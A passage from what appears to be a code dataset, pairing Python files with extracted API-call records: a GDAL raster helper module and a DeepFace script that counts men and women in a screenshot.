logspace\n'), ((3174, 3205), 'LabFuncs.FormFactorHelm', 'LabFuncs.FormFactorHelm', (['E_r', 'A'], {}), '(E_r, A)\n', (3197, 3205), False, 'import LabFuncs\n'), ((3681, 3696), 'numpy.zeros', 'zeros', ([], {'shape': 'ne'}), '(shape=ne)\n', (3686, 3696), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((5153, 5184), 'LabFuncs.FormFactorHelm', 'LabFuncs.FormFactorHelm', (['E_r', 'A'], {}), '(E_r, A)\n', (5176, 5184), False, 'import LabFuncs\n'), ((5491, 5547), 'LabFuncs.LabVelocity', 'LabFuncs.LabVelocity', (['t[i]', 'Loc', 'HaloModel.RotationSpeed'], {}), '(t[i], Loc, HaloModel.RotationSpeed)\n', (5511, 5547), False, 'import LabFuncs\n'), ((7113, 7129), 'numpy.size', 'size', (['costh_vals'], {}), '(costh_vals)\n', (7117, 7129), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7143, 7157), 'numpy.zeros', 'zeros', ([], {'shape': 'n'}), '(shape=n)\n', (7148, 7157), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((1329, 1360), 'numpy.sqrt', 'sqrt', (['(1.0 / (2 * m_N_keV * E_r))'], {}), '(1.0 / (2 * m_N_keV * E_r))\n', (1333, 1360), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((3529, 3585), 'LabFuncs.LabVelocity', 'LabFuncs.LabVelocity', (['t[0]', 'Loc', 'HaloModel.RotationSpeed'], {}), '(t[0], Loc, HaloModel.RotationSpeed)\n', (3549, 3585), False, 'import LabFuncs\n'), ((4729, 4737), 'numpy.shape', 'shape', (['E'], {}), '(E)\n', (4734, 4737), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((5393, 5402), 'numpy.size', 'size', (['E_r'], {}), '(E_r)\n', (5397, 5402), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((5890, 5900), 'numpy.shape', 'shape', (['E_r'], {}), '(E_r)\n', (5895, 5900), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((6018, 6126), 'numpy.exp', 'exp', (['(-(v_min[v_min + vlabdotq < v_esc] + vlabdotq[v_min + vlabdotq < v_esc]) **\n 2.0 / (2 * sig_v ** 2.0))'], {}), '(-(v_min[v_min + vlabdotq < v_esc] + vlabdotq[v_min + vlabdotq < v_esc]) **\n 2.0 / (2 * sig_v ** 2.0))\n', (6021, 6126), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((6243, 6282), 'numpy.exp', 'exp', (['(-v_esc ** 2.0 / (2 * sig_v ** 2.0))'], {}), '(-v_esc ** 2.0 / (2 * sig_v ** 2.0))\n', (6246, 6282), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7809, 7823), 'numpy.size', 'size', (['E_r_vals'], {}), '(E_r_vals)\n', (7813, 7823), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7837, 7853), 'numpy.size', 'size', (['costh_vals'], {}), '(costh_vals)\n', (7841, 7853), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7867, 7888), 'numpy.zeros', 'zeros', ([], {'shape': '(nc, ne)'}), '(shape=(nc, ne))\n', (7872, 7888), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((12117, 12125), 'numpy.shape', 'shape', (['C'], {}), '(C)\n', (12122, 12125), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((12651, 12766), 'numpy.array', 'array', (['[E[i, j], E[i, j + 1], E[i + 1, j], E[i + 1, j + 1], E[i, j], E[i, j + 1],\n E[i + 1, j], E[i + 1, j + 1]]'], {}), '([E[i, j], E[i, j + 1], E[i + 1, j], E[i + 1, j + 1], E[i, j], E[i, j +\n 1], E[i + 1, j], E[i + 1, j + 1]])\n', (12656, 12766), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((12771, 12886), 'numpy.array', 'array', (['[C[i, j], C[i, j + 1], C[i + 1, j], C[i + 1, j + 1], C[i, j], C[i, j + 1],\n C[i + 1, j], C[i + 1, j + 1]]'], {}), '([C[i, j], C[i, j + 1], C[i + 1, j], C[i + 1, j + 1], C[i, j], C[i, j +\n 1], C[i + 1, j], C[i + 1, j + 1]])\n', (12776, 12886), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((12891, 12966), 'numpy.array', 'array', (['[0, 0, 0, 0, dR[i, j], dR[i, j + 1], dR[i + 1, j], dR[i + 1, j + 1]]'], {}), '([0, 0, 0, 0, dR[i, j], dR[i, j + 1], dR[i + 1, j], dR[i + 1, j + 1]])\n', (12896, 12966), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((3753, 3809), 'LabFuncs.LabVelocity', 'LabFuncs.LabVelocity', (['t[i]', 'Loc', 'HaloModel.RotationSpeed'], {}), '(t[i], Loc, HaloModel.RotationSpeed)\n', (3773, 3809), False, 'import LabFuncs\n'), ((3952, 3962), 'scipy.special.erf', 'erf', (['(x + y)'], {}), '(x + y)\n', (3955, 3962), False, 'from scipy.special import erf\n'), ((3961, 3971), 'scipy.special.erf', 'erf', (['(x - y)'], {}), '(x - y)\n', (3964, 3971), False, 'from scipy.special import erf\n'), ((3987, 3999), 'numpy.exp', 'exp', (['(-z ** 2)'], {}), '(-z ** 2)\n', (3990, 3999), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((4033, 4039), 'scipy.special.erf', 'erf', (['z'], {}), '(z)\n', (4036, 4039), False, 'from scipy.special import erf\n'), ((4040, 4050), 'scipy.special.erf', 'erf', (['(x - y)'], {}), '(x - y)\n', (4043, 4050), False, 'from scipy.special import erf\n'), ((4072, 4084), 'numpy.exp', 'exp', (['(-z ** 2)'], {}), '(-z ** 2)\n', (4075, 4084), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((5430, 5439), 'numpy.size', 'size', (['E_r'], {}), '(E_r)\n', (5434, 5439), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((5951, 5978), 'numpy.sqrt', 'sqrt', (['(2 * pi * sig_v ** 2.0)'], {}), '(2 * pi * sig_v ** 2.0)\n', (5955, 5978), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7287, 7309), 'numpy.sqrt', 'sqrt', (['(1 - costh ** 2.0)'], {}), '(1 - costh ** 2.0)\n', (7291, 7309), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7340, 7362), 'numpy.sqrt', 'sqrt', (['(1 - costh ** 2.0)'], {}), '(1 - costh ** 2.0)\n', (7344, 7362), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7425, 7447), 'numpy.sqrt', 'sqrt', (['(1 - costh ** 2.0)'], {}), '(1 - costh ** 2.0)\n', (7429, 7447), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7478, 7500), 'numpy.sqrt', 'sqrt', (['(1 - costh ** 2.0)'], {}), '(1 - costh ** 2.0)\n', (7482, 7500), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((11192, 11235), 'numpy.linspace', 'linspace', (['E_r_edges[j]', 'E_r_edges[j + 1]', '(5)'], {}), '(E_r_edges[j], E_r_edges[j + 1], 5)\n', (11200, 11235), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((13019, 13042), 'numpy.column_stack', 'column_stack', (['(x, y, z)'], {}), '((x, y, z))\n', (13031, 13042), False, 'from numpy import nan, isnan, column_stack, amin, amax\n'), ((7279, 7286), 'numpy.cos', 'cos', (['ph'], {}), '(ph)\n', (7282, 7286), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((7332, 7339), 'numpy.sin', 'sin', (['ph'], {}), '(ph)\n', (7335, 7339), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((7417, 7424), 'numpy.cos', 'cos', (['ph'], {}), '(ph)\n', (7420, 7424), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((7470, 7477), 'numpy.sin', 'sin', (['ph'], {}), '(ph)\n', (7473, 7477), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((11345, 11362), 'numpy.sqrt', 'sqrt', (['(smin / A_CR)'], {}), '(smin / A_CR)\n', (11349, 11362), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((11361, 11378), 'numpy.sqrt', 'sqrt', (['(smax / A_CR)'], {}), '(smax / A_CR)\n', (11365, 11378), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((13066, 13115), 'scipy.spatial.ConvexHull', 'ConvexHull', (['points'], {'qhull_options': '"""W1e-15 E1e-15"""'}), "(points, qhull_options='W1e-15 E1e-15')\n", (13076, 13115), False, 'from scipy.spatial import ConvexHull\n'), ((3975, 3983), 'numpy.sqrt', 'sqrt', (['pi'], {}), '(pi)\n', (3979, 3983), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((4054, 4062), 'numpy.sqrt', 'sqrt', (['pi'], {}), '(pi)\n', (4058, 4062), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((8058, 8080), 'numpy.sqrt', 'sqrt', (['(1 - costh ** 2.0)'], {}), '(1 - costh ** 2.0)\n', (8062, 8080), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((8115, 8137), 'numpy.sqrt', 'sqrt', (['(1 - costh ** 2.0)'], {}), '(1 - costh ** 2.0)\n', (8119, 8137), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((7578, 7592), 'numpy.ones', 'ones', ([], {'shape': 'np'}), '(shape=np)\n', (7582, 7592), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((7693, 7707), 'numpy.ones', 'ones', ([], {'shape': 'np'}), '(shape=np)\n', (7697, 7707), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((8050, 8057), 'numpy.cos', 'cos', (['ph'], {}), '(ph)\n', (8053, 8057), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((8107, 8114), 'numpy.sin', 'sin', (['ph'], {}), '(ph)\n', (8110, 8114), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((8501, 8523), 'numpy.sqrt', 'sqrt', (['(1 - costh ** 2.0)'], {}), '(1 - costh ** 2.0)\n', (8505, 8523), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((8562, 8584), 'numpy.sqrt', 'sqrt', (['(1 - costh ** 2.0)'], {}), '(1 - costh ** 2.0)\n', (8566, 8584), False, 'from numpy import pi, sqrt, exp, zeros, size, shape, array, linspace, logspace\n'), ((8220, 8234), 'numpy.ones', 'ones', ([], {'shape': 'np'}), '(shape=np)\n', (8224, 8234), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((8493, 8500), 'numpy.cos', 'cos', (['ph'], {}), '(ph)\n', (8496, 8500), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((8554, 8561), 'numpy.sin', 'sin', (['ph'], {}), '(ph)\n', (8557, 8561), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n'), ((8681, 8695), 'numpy.ones', 'ones', ([], {'shape': 'np'}), '(shape=np)\n', (8685, 8695), False, 'from numpy import cos, sin, arctan2, arccos, trapz, ones, log10, ndim, meshgrid\n')]
|
# -*- coding: utf-8 -*-
"""
Copyright (c) 2020-2022 INRAE
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
"""Classes for basic raster and array manipulation"""
import osgeo
from osgeo import gdal, osr
import numpy as np
# ---------------------------------------------------- Helpers ---------------------------------------------------------
def gdal_open(filename):
"""
Read an image as numpy array
"""
gdal_ds = gdal.Open(filename)
if gdal_ds is None:
raise Exception("Unable to open file {}".format(filename))
return gdal_ds
def read_as_np(filename):
"""
Read a raster image as numpy array
"""
gdal_ds = gdal_open(filename)
return gdal_ds.ReadAsArray()
def set_gdal_cachemax(gdal_cachemax):
"""
Set GDAL_CACHEMAX
"""
gdal.SetConfigOption("GDAL_CACHEMAX", gdal_cachemax)
def get_sub_arr(np_arr, patch_location, patch_size, ref_patch_size):
"""
Get the np.array
:param np_arr: the numpy array, either edge_stats_fn or clouds_stats_fn
:param patch_location: patch location (new_elem, y)
:param patch_size: patch size (single value) it will set the size of the returned sub array, wrt the ref_patch_size
:param ref_patch_size: reference patch size (single value)
:return: the sub array
"""
scale = int(patch_size / ref_patch_size)
return np_arr[scale * patch_location[1]:scale * (patch_location[1] + 1),
scale * patch_location[0]:scale * (patch_location[0] + 1)]
def save_numpy_array_as_raster(ref_fn, np_arr, out_fn, scale=1.0):
"""
Save a numpy array into a raster file
:param ref_fn: reference raster (output will have the same proj, geotransform, size)
:param np_arr: numpy array
:param out_fn: output filename for the raster
:param scale: output pixel spacing scaling
"""
gdal.AllRegister()
in_ds = gdal_open(ref_fn)
driver = in_ds.GetDriver()
out_ds = driver.Create(out_fn, np_arr.shape[1], np_arr.shape[0], 1, gdal.GDT_Int32)
out_band = out_ds.GetRasterBand(1)
out_band.WriteArray(np.transpose(np_arr), 0, 0)
out_band.FlushCache()
geotransform = in_ds.GetGeoTransform()
# Update if we want to change pixel spacing
if scale != 1.0:
geotransform = list(geotransform)
geotransform[1] *= scale
geotransform[5] *= scale
geotransform = tuple(geotransform)
out_ds.SetGeoTransform(geotransform)
out_ds.SetProjection(in_ds.GetProjection())
def convert_to_4326(coordinates, gdal_ds):
"""
Convert some coordinates to 4326
:param coordinates: (x, y) coordinates, expressed in the coordinate system of the dataset `gdal_ds`
:param gdal_ds: gdal dataset
:return:
"""
# Get the coordinate system of the dataset
initial_crs = osr.SpatialReference()
initial_crs.ImportFromWkt(gdal_ds.GetProjectionRef())
# Set up the coordinate reference system, WGS84
crs_4326 = osr.SpatialReference()
if int(osgeo.__version__[0]) >= 3:
# GDAL 3 changes axis order: https://github.com/OSGeo/gdal/issues/1546
crs_4326.SetAxisMappingStrategy(osgeo.osr.OAMS_TRADITIONAL_GIS_ORDER)
crs_4326.ImportFromEPSG(4326)
# create a transform object to convert between coordinate systems
transform = osr.CoordinateTransformation(initial_crs, crs_4326)
# Transform the coordinates in lat long
lon, lat, _ = transform.TransformPoint(*coordinates)
return lon, lat
|
[
"osgeo.osr.CoordinateTransformation",
"numpy.transpose",
"osgeo.gdal.SetConfigOption",
"osgeo.gdal.Open",
"osgeo.osr.SpatialReference",
"osgeo.gdal.AllRegister"
] |
[((1412, 1431), 'osgeo.gdal.Open', 'gdal.Open', (['filename'], {}), '(filename)\n', (1421, 1431), False, 'from osgeo import gdal, osr\n'), ((1776, 1828), 'osgeo.gdal.SetConfigOption', 'gdal.SetConfigOption', (['"""GDAL_CACHEMAX"""', 'gdal_cachemax'], {}), "('GDAL_CACHEMAX', gdal_cachemax)\n", (1796, 1828), False, 'from osgeo import gdal, osr\n'), ((2826, 2844), 'osgeo.gdal.AllRegister', 'gdal.AllRegister', ([], {}), '()\n', (2842, 2844), False, 'from osgeo import gdal, osr\n'), ((3779, 3801), 'osgeo.osr.SpatialReference', 'osr.SpatialReference', ([], {}), '()\n', (3799, 3801), False, 'from osgeo import gdal, osr\n'), ((3928, 3950), 'osgeo.osr.SpatialReference', 'osr.SpatialReference', ([], {}), '()\n', (3948, 3950), False, 'from osgeo import gdal, osr\n'), ((4268, 4319), 'osgeo.osr.CoordinateTransformation', 'osr.CoordinateTransformation', (['initial_crs', 'crs_4326'], {}), '(initial_crs, crs_4326)\n', (4296, 4319), False, 'from osgeo import gdal, osr\n'), ((3057, 3077), 'numpy.transpose', 'np.transpose', (['np_arr'], {}), '(np_arr)\n', (3069, 3077), True, 'import numpy as np\n')]
|
import face_recognition
from deepface import DeepFace
import cv2
import numpy as np
from tensorflow.keras.preprocessing import image
import pyscreenshot as ImageGrab
model = ""
def preprocess_img(img, target_size=(224,224)):
img = cv2.resize(img, target_size)
img_pixels = image.img_to_array(img)
img_pixels = np.expand_dims(img_pixels, axis = 0)
img_pixels /= 255 #normalize input in [0, 1]
return img_pixels
def grab_screenshot():
im = ImageGrab.grab()
return im
def recog_gender(img_file=None, image=None):
global model
if model == "": # only need to build the model for the first time
model = DeepFace.build_model("Gender")
if img_file:
image = face_recognition.load_image_file(img_file)
face_locations = face_recognition.face_locations(image)
#print("I found {} face(s) in this photograph.".format(len(face_locations)))
count_man = 0
count_woman = 0
for face_location in face_locations:
top, right, bottom, left = face_location
# print("A face is located at pixel location Top: {}, Left: {}, Bottom: {}, Right: {}".format(top, left, bottom, right))
face_image = image[top:bottom, left:right]
face_image = preprocess_img(img=face_image)
gender_predictions = model.predict(face_image)[0,:]
if np.argmax(gender_predictions) == 0:
count_woman += 1
elif np.argmax(gender_predictions) == 1:
count_man += 1
return count_man, count_woman
if __name__ == '__main__':
count_man, count_woman = recog_gender(img_file="sample_zoom_screenshot.png")
print("man:", count_man, "woman:", count_woman )
|
[
"numpy.argmax",
"pyscreenshot.grab",
"tensorflow.keras.preprocessing.image.img_to_array",
"numpy.expand_dims",
"deepface.DeepFace.build_model",
"face_recognition.face_locations",
"face_recognition.load_image_file",
"cv2.resize"
] |
[((237, 265), 'cv2.resize', 'cv2.resize', (['img', 'target_size'], {}), '(img, target_size)\n', (247, 265), False, 'import cv2\n'), ((283, 306), 'tensorflow.keras.preprocessing.image.img_to_array', 'image.img_to_array', (['img'], {}), '(img)\n', (301, 306), False, 'from tensorflow.keras.preprocessing import image\n'), ((324, 358), 'numpy.expand_dims', 'np.expand_dims', (['img_pixels'], {'axis': '(0)'}), '(img_pixels, axis=0)\n', (338, 358), True, 'import numpy as np\n'), ((466, 482), 'pyscreenshot.grab', 'ImageGrab.grab', ([], {}), '()\n', (480, 482), True, 'import pyscreenshot as ImageGrab\n'), ((775, 813), 'face_recognition.face_locations', 'face_recognition.face_locations', (['image'], {}), '(image)\n', (806, 813), False, 'import face_recognition\n'), ((647, 677), 'deepface.DeepFace.build_model', 'DeepFace.build_model', (['"""Gender"""'], {}), "('Gender')\n", (667, 677), False, 'from deepface import DeepFace\n'), ((711, 753), 'face_recognition.load_image_file', 'face_recognition.load_image_file', (['img_file'], {}), '(img_file)\n', (743, 753), False, 'import face_recognition\n'), ((1326, 1355), 'numpy.argmax', 'np.argmax', (['gender_predictions'], {}), '(gender_predictions)\n', (1335, 1355), True, 'import numpy as np\n'), ((1404, 1433), 'numpy.argmax', 'np.argmax', (['gender_predictions'], {}), '(gender_predictions)\n', (1413, 1433), True, 'import numpy as np\n')]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.